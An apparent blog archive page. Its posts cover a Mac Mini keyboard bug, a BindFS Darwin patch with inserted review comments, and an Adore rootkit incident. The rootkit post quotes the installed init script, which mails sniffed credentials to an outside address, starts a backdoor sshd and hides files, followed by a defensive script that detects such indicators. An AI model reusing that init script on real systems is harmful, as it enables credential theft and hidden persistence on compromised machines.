Archive for the ‘Computors’ Category

Mac Mini and the Keyboards

Wednesday, March 19th, 2008

An old Mac Mini, or as Leopard calls it, a MacMini1,1 @ 1.66GHz (x 2), 2048 MB RAM, doesn’t respond to any of the startup sequences while booting, but only when I’m using the new Aluminum Apple Keyboard. When I’m using an old Apple Pro Keyboard, everything works fine.

And here’s the kicker: while the Mini starts up, I get into the “select startup disk mode” using the old keyboard—I’m able to navigate between the choices with the old keyboard. If I switch to the new keyboard, nothing works.

For some obscure to me reason, MacMini1,1 doesn’t recognize the Aluminum Apple Keyboard while it’s starting up.

Apple has been notified of the bug and from what I can tell, they’re already aware of the bug. The details of the Mac Mini are (Model Identifier: Macmini1,1; Boot ROM Version: MM11.0055.B08; SMC Version: 1.3f4).

BindFS in Darwin

Sunday, November 11th, 2007

I just finished writing a patch for BindFS, a FUSE file-system, to work under Darwin 9:

diff -urN bindfs-1.4.1/src/bindfs.c bindfs-1.4.1-darwin/src/bindfs.c
--- bindfs-1.4.1/src/bindfs.c	2007-07-17 15:28:25.000000000 -0500
+++ bindfs-1.4.1-darwin/src/bindfs.c	2007-11-12 05:52:15.000000000 -0600
@@ -52,6 +52,8 @@
 #include "userinfo.h"
 #include "misc.h"
 
+#include <libgen .h>
+
 /* SETTINGS */
 static struct settings {
     const char *progname;
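Review bot: the added include in this hunk reads <libgen .h>, with a space before ".h", and a header name written that way will not resolve, so basename() ends up without a declaration. It should be <libgen.h>. A one-line comment saying the header is there for basename() would also help the next reader.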
@@ -636,7 +638,7 @@
 
     /* fuse checks permissions for us */
     path = process_path(path);
-    if (lsetxattr(path, name, value, size, flags) == -1)
+    if (setxattr(path, name, value, size, 0, flags | XATTR_NOFOLLOW) == -1)
         return -errno;
     return 0;
 }
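Review bot: the new setxattr(path, name, value, size, 0, flags | XATTR_NOFOLLOW) call replaces lsetxattr() outright, so this file stops building on platforms that only provide the l*xattr functions; the same holds for the getxattr, listxattr and removexattr hunks that follow. Keep both forms and select between them with a platform guard such as #ifdef __APPLE__, so the patch can go to BindFS upstream as well as to MacPorts.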
@@ -648,7 +650,7 @@
 
     path = process_path(path);
     /* fuse checks permissions for us */
-    res = lgetxattr(path, name, value, size);
+    res = getxattr(path, name, value, size, 0, XATTR_NOFOLLOW);
     if (res == -1)
         return -errno;
     return res;
@@ -660,7 +662,7 @@
 
     path = process_path(path);
     /* fuse checks permissions for us */
-    res = llistxattr(path, list, size);
+    res = listxattr(path, list, size, XATTR_NOFOLLOW);
     if (res == -1)
         return -errno;
     return res;
@@ -673,7 +675,7 @@
 
     path = process_path(path);
     /* fuse checks permissions for us */
-    if (lremovexattr(path, name) == -1)
+    if (removexattr(path, name, XATTR_NOFOLLOW) == -1)
         return -errno;
     return 0;
 }
@@ -795,7 +797,7 @@
     switch ((enum OptionKey)key)
     {
     case OPTKEY_HELP:
-        print_usage(basename(settings.progname));
+        print_usage(basename((const char*) settings.progname));
         exit(0);
 
     case OPTKEY_VERSION:
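Review bot: in the OPTKEY_HELP case the cast (const char*) settings.progname changes nothing, because progname is already declared const char * in struct settings. basename() from libgen.h takes a non-const char * and POSIX allows it to modify its argument, so the warning this cast is presumably meant to silence points at a real problem. Pass a writable copy of progname to basename() instead of casting.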

I aspire to submit that to MacPorts and/or to BindFS fairly soon.

patch file format

Sunday, November 11th, 2007

Now therefore, be it declared, that this establishment shall accept patch files only in

diff -urN

format.

Adore Rootkit by darkorc3

Monday, November 5th, 2007

A few days ago I discovered that a virtual machine on my OpenVZ server was compromised. The server was exploited and the Adore Rootkit was installed. It emailed data to darkorc3@yahoo.com on startup. The following script was installed on every run level in rc.d:

#!/bin/sh
cd /usr/bin/.tmp
./vad tcp.log >conturi.log
cat /usr/bin/.tmp/conturi.log|mail -s "back" darkorc3@yahoo.com
rm -rf /usr/bin/.tmp/tcp.log
./sshd -f sshd_config
./httpd &
/sbin/insmod -f adore.o > /dev/null 2>&1
/sbin/insmod -f cleaner.o > /dev/null 2>&1
/sbin/rmmod cleaner > /dev/null 2>&1
./ava i `cat pid` > /dev/null 2>&1
./ava i `cat sniff.pid` > /dev/null 2>&1
./ava h . > /dev/null 2>&1
for i in {2,3,4,5}
do
./ava h /etc/rc.d/rc$i.d/S96daemon > /dev/null 2>&1
done
./ava h /proc/ksyms > /dev/null 2>&1

In my few years as a Linux system administrator, this is the smartest, most potentially harmful, and most elegant exploit I have come across. If you have or need any more information, please let me know.
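
The init script quoted above has several traits that can be matched in init scripts on a filesystem examined offline. The following is an added example, not part of the original post: the function names, the indicator labels and the offline mount point ROOT are assumptions for illustration, and the sample tree is constructed from lines of the quoted script.

```shell
#!/bin/sh
# Added example, not from the post. Indicator table: "label|ERE", each pattern
# derived only from the script quoted in the post.
INDICATORS='forced-module-load|insmod[[:space:]]+-f[[:space:]]
runs-from-dot-dir-under-bin|/s?bin/\.[[:alnum:]_]+
pipes-output-to-mail|\|[[:space:]]*mail[[:space:]]+-s
sshd-with-own-config|sshd[[:space:]]+-f[[:space:]]'

# scan_rc ROOT: print "path<TAB>label" for every init script under ROOT that
# matches an indicator; exit status 0 if anything matched, 1 otherwise.
# ROOT is an assumed mount point of the filesystem being examined offline.
scan_rc() {
    root=${1%/}
    hits=0
    for f in "$root"/etc/rc.d/rc*.d/* "$root"/etc/rc.d/init.d/*; do
        # Skip symlinks: absolute targets would resolve outside ROOT.
        [ -L "$f" ] && continue
        [ -f "$f" ] || continue
        while IFS= read -r line; do
            label=${line%%|*}   # text before the first "|"
            re=${line#*|}       # everything after it, "|" in the regex included
            if grep -Eq -e "$re" "$f"; then
                printf '%s\t%s\n' "${f#"$root"}" "$label"
                hits=$((hits + 1))
            fi
        done <<EOF
$INDICATORS
EOF
    done
    [ "$hits" -gt 0 ]
}

# build_sample DIR: constructed test tree with one benign script and one
# script carrying four lines copied from the post.
build_sample() {
    mkdir -p "$1/etc/rc.d/rc3.d" "$1/etc/rc.d/init.d"
    printf '#!/bin/sh\n/usr/sbin/crond\n' > "$1/etc/rc.d/init.d/crond"
    cat > "$1/etc/rc.d/rc3.d/S96daemon" <<'EOF'
#!/bin/sh
cd /usr/bin/.tmp
cat /usr/bin/.tmp/conturi.log|mail -s "back" darkorc3@yahoo.com
./sshd -f sshd_config
/sbin/insmod -f adore.o > /dev/null 2>&1
EOF
}
```

Run it against a mounted copy of the filesystem rather than on the live machine, since the quoted script hides its own rc.d entries from the running system.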

Software Detection of Currency

Monday, October 15th, 2007

A description of how software detects the image of a currency pinpoints one and only one thing: the sad efficiency of security by obscurity and how the capitalist software market imposed a standard. I wonder to what extent GIMP would be able to adhere to such standards.

